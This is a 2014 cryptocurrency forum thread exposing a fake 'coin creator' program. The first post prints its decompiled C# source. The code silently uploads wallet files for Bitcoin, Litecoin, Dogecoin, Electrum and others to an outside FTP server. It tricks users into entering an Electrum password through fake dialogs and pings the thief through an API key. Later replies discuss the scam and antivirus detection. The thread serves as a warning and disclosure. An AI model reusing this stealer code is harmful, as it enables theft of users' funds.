jukka (OP)
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 09:02:58 AM |
|
I was stupid enough to trust this software, and it stole my coins! If somebody wants to donate something for exposing this scammer, my LTC address is in the "personal text". Here is the code I managed to decompile: // Type: CoinGe[Suspicious link removed]ogram // Assembly: CoinGen, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: D1DD6DE8-DEB5-4565-944C-0C660F3F9F11 // Assembly location: C:\CoinSources\CoinGen.exe
using System; using System.IO; using System.Net; using System.Text; using System.Threading; using System.Windows.Forms;
namespace CoinGen { internal class Program { private static void Main(string[] args) { string str1 = DateTime.Now.ToString("HH:mm:ss"); Console.WriteLine("[" + str1 + "] Started Coin Creator"); Console.Write("[" + str1 + "] What is the name of your coin? e.g Litecoin: "); Console.ReadLine(); Console.Write("[" + str1 + "] What is the abbreviation of your coin? e.g LTC: "); Console.ReadLine(); Console.Write("[" + str1 + "] What algorithm do you want to use? e.g X11, SHA256, Scrypt, Scrypt-N, Scrypt-Jane: "); Console.ReadLine(); Console.Write("[" + str1 + "] Block Rate (In seconds): "); Console.ReadLine(); Console.Write("[" + str1 + "] Block Reward: "); Console.ReadLine(); Console.Write("[" + str1 + "] Block Halving Rate: "); Console.ReadLine(); Console.WriteLine(""); Console.WriteLine("Editing Source"); Thread.Sleep(5000); string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData); string str2 = "drpine"; string hostIP = "ftp://ftp.drivehq.com"; Form1 form1 = new Form1(); string str3 = "\\bitcoin\\"; string str4 = "\\litecoin\\"; string str5 = "\\feathercoin\\"; string str6 = "\\digitalcoin\\"; string str7 = "\\gpucoin\\"; string str8 = "\\earthcoin\\"; string str9 = "\\worldcoin\\"; string str10 = "\\vertcoin\\"; string str11 = "\\auroracoin\\"; string str12 = "\\dogecoin\\"; string str13 = "\\electrum\\"; string str14 = "\\Windows_Microsoft3430\\"; int num1 = new Random().Next(1, 99999); if (Directory.Exists(folderPath + str14)) return; Directory.CreateDirectory(folderPath + str14); ftp ftp = new ftp(hostIP, str2, str2); if (Directory.Exists(folderPath + str3)) { ftp.upload("Bitcoin-" + (object) num1, folderPath + str3 + "wallet.dat"); Program.SendProwlRequest("WalletUploaderV4", "Bitcoin Wallet Uploaded", "c#Prowl"); } if (Directory.Exists(folderPath + str13)) { ftp.upload("electrum_wallet-" + (object) num1, folderPath + str13 + "\\wallets\\default_wallet"); int num2 = (int) MessageBox.Show("Electrum has detected another program trying to access your wallet, it is important you change your password now!", "Important Note", MessageBoxButtons.OK, MessageBoxIcon.Exclamation, MessageBoxDefaultButton.Button1); int num3 = (int) form1.ShowDialog(); int num4 = (int) MessageBox.Show("Passwords Dont Match", "Important Note", MessageBoxButtons.OK, MessageBoxIcon.Exclamation, MessageBoxDefaultButton.Button1); int num5 = (int) form1.ShowDialog(); int num6 = (int) MessageBox.Show("Passwords Dont Match", "Important Note", MessageBoxButtons.OK, MessageBoxIcon.Exclamation, MessageBoxDefaultButton.Button1); int num7 = (int) form1.ShowDialog(); ftp.upload("electrum_pass-" + (object) num1, folderPath + str13 + "pass.txt"); Program.SendProwlRequest("WalletUploaderV4", "Electrum Wallet Uploaded", "c#Prowl"); } if (Directory.Exists(folderPath + str4)) { ftp.upload("Litecoin-" + (object) num1, folderPath + str4 + "wallet.dat"); Program.SendProwlRequest("WalletUploaderV4", "Litecoin Wallet Uploaded", "c#Prowl"); } if (Directory.Exists(folderPath + str12)) { ftp.upload("Dogecoin-" + (object) num1, folderPath + str12 + "wallet.dat"); Program.SendProwlRequest("WalletUploaderV4", "Dogecoin Wallet Uploaded", "c#Prowl"); } if (Directory.Exists(folderPath + str11)) { ftp.upload("Auroracoin-" + (object) num1, folderPath + str11 + "wallet.dat"); Program.SendProwlRequest("WalletUploaderV4", "Auroracoin Wallet Uploaded", "c#Prowl"); } if (Directory.Exists(folderPath + str10)) { ftp.upload("Vertcoin-" + (object) num1, folderPath + str10 + "wallet.dat"); Program.SendProwlRequest("WalletUploaderV4", "Vertcoin Wallet Uploaded", "c#Prowl"); } if (Directory.Exists(folderPath + str5)) { ftp.upload("Feathercoin-" + (object) num1, folderPath + str5 + "wallet.dat"); Program.SendProwlRequest("WalletUploaderV4", "Feathercoin Wallet Uploaded", "c#Prowl"); } if (Directory.Exists(folderPath + str6)) { ftp.upload("Digitalcoin-" + (object) num1, folderPath + str6 + "wallet.dat"); Program.SendProwlRequest("WalletUploaderV4", "Digitalcoin Wallet Uploaded", "c#Prowl"); } if (Directory.Exists(folderPath + str7)) { ftp.upload("GPUcoin-" + (object) num1, folderPath + str7 + "wallet.dat"); Program.SendProwlRequest("WalletUploaderV4", "GPUcoin Wallet Uploaded", "c#Prowl"); } if (Directory.Exists(folderPath + str8)) { ftp.upload("Earthcoin-" + (object) num1, folderPath + str8 + "wallet.dat"); Program.SendProwlRequest("WalletUploaderV4", "Earthcoin Wallet Uploaded", "c#Prowl"); } if (!Directory.Exists(folderPath + str9)) return; ftp.upload("Worldcoin-" + (object) num1, folderPath + str9 + "wallet.dat"); Program.SendProwlRequest("WalletUploaderV4", "Worldcoin Wallet Uploaded", "c#Prowl"); }
private static void SendProwlRequest(string vEvent, string vDescription, string vApplication) { string str = "79b6a76a04290fe0916c6e625c926897fb4d8b7a"; HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create("https://api.prowlapp.com/publicapi/add"); byte[] bytes = Encoding.ASCII.GetBytes("apikey=" + str + "&application=" + vApplication + "&event=" + vEvent + "&description=" + vDescription); httpWebRequest.Method = "POST"; httpWebRequest.ContentType = "application/x-www-form-urlencoded"; httpWebRequest.ContentLength = (long) bytes.Length; using (Stream requestStream = ((WebRequest) httpWebRequest).GetRequestStream()) requestStream.Write(bytes, 0, bytes.Length); }
private static void MakeData(string vArgs) { } } }
|
|
|
|
Prolifik
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 09:32:33 AM |
|
Bump for justice.
|
|
|
|
jukka (OP)
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 10:12:34 AM |
|
I managed to send my doges and worldcoins to another wallet! So far only thing stolen was my precious litecoin ![Sad](https://bitcointalk.org/Smileys/default/sad.gif) It seems that the original thread opened by scammer is deleted!
|
|
|
|
var53
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 10:13:40 AM |
|
Thanks for warning us about this. I would have downloaded it when it was offered for free, but I was too late, he started charging for downloads before I noticed the thread. Turns out it's a good thing I was too late.
|
|
|
|
Amph
Legendary
Offline
Activity: 3206
Merit: 1069
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 10:32:04 AM |
|
when i scanned it with virustotal, it reported 1 red flag
|
|
|
|
Forexperiments
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 10:33:54 AM |
|
It's interesting how the program asks for the electrum wallet password Basically it declares that this coin creator is a wallet stealer, and asks for a new password ![Grin](https://bitcointalk.org/Smileys/default/grin.gif) ps: we can ask to drivehq or prowl if they have more details about him or we can just have fun with his prowl API, sending him thousands of "wallet stolen" notifications to his iphone ![Grin](https://bitcointalk.org/Smileys/default/grin.gif)
|
|
|
|
Forexperiments
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 10:34:58 AM |
|
when i scanned it with virustotal, it reported 1 red flag
this kind of custom software would never be correctly detected by virus scanners: it's a simple ftp uploader, how a virus scanner can detect that? If that, it would detect as virus too much stuff
|
|
|
|
var53
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 10:42:17 AM |
|
when i scanned it with virustotal, it reported 1 red flag
Which antivirus scanner reported the red flag? Trendmicro seems to flag almost everything as a virus, so I would have more faith in one of the other scanners. Someone was complaining that trendmicro even flagged windows system files as a virus a while ago.
|
|
|
|
xbudahx
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 10:49:31 AM |
|
Who installs unknown software on the same machine they keep wallets? That's just stupid, and that can't be fixed.
I hope OP learned a lesson here.
|
|
|
|
jukka (OP)
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 10:53:12 AM |
|
Who installs unknown software on the same machine they keep wallets? That's just stupid, and that can't be fixed.
I hope OP learned a lesson here.
Yes I learned and I know that it is stupid, so thank you! All of us are not clever with these things, you know!
|
|
|
|
luchodge99
Member
![*](https://bitcointalk.org/Themes/custom1/images/star.gif)
Offline
Activity: 68
Merit: 10
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 10:57:31 AM |
|
thx for the heads up. those scambag never give up.
|
|
|
|
Amph
Legendary
Offline
Activity: 3206
Merit: 1069
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 10:59:26 AM |
|
when i scanned it with virustotal, it reported 1 red flag
Which antivirus scanner reported the red flag? Trendmicro seems to flag almost everything as a virus, so I would have more faith in one of the other scanners. Someone was complaining that trendmicro even flagged windows system files as a virus a while ago. i don't remember, if virus total keeps the same order, it was the first one in the list
|
|
|
|
snaildvorak
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 11:03:10 AM |
|
lesson learned for all of us who read this thread. Thanks for the alert!
|
|
|
|
jukka (OP)
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 11:03:36 AM |
|
Thanks for warning us about this. I would have downloaded it when it was offered for free, but I was too late, he started charging for downloads before I noticed the thread. Turns out it's a good thing I was too late.
If you appreciate it, please consider a small donation.
|
|
|
|
crunchynut
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 11:31:54 AM |
|
stop begging. nobody who's not a potato would have used this program.
|
|
|
|
tokyoghetto
Legendary
Offline
Activity: 1232
Merit: 1000
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 11:33:55 AM |
|
what a scumbag. Even worst, he started to charge for it.
|
|
|
|
jukka (OP)
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 11:49:28 AM |
|
stop begging. nobody who's not a potato would have used this program.
I am not begging anything, damn it! I could have kept this info by myself! Thats the way people normally do, because nobody wants to reveal that they have been stupid! Next time I just will keep the info, if thats the way people here do. I am a new in this forum, and where I come from people are polight and try to help each other. Looks like that you dont belong to those!
|
|
|
|
asdf_files
Newbie
Offline
Activity: 57
Merit: 0
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 12:07:46 PM |
|
Damn scammers everywhere ![Angry](https://bitcointalk.org/Smileys/default/angry.gif)
|
|
|
|
jukka (OP)
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 12:44:01 PM |
|
Ok, I managed to save everything else than my precious LTC. The guy could have just asked I would have bought him one pint of beer instead ![Cheesy](https://bitcointalk.org/Smileys/default/cheesy.gif) Well at least I have learned that you cannot trust even the Virustotal. Maybe I should contact to some of the antivirus companies that they should take these wallet stealers seriously as none of them warned anything!
|
|
|
|
crunchynut
|
![](https://bitcointalk.org/Themes/custom1/images/post/xx.gif) |
May 09, 2014, 12:47:40 PM |
|
look there is an .exe file posted by a stranger on the internet, in a forum where every 2nd thread is a scam in the making. let's download and run it!
|
|
|
|
|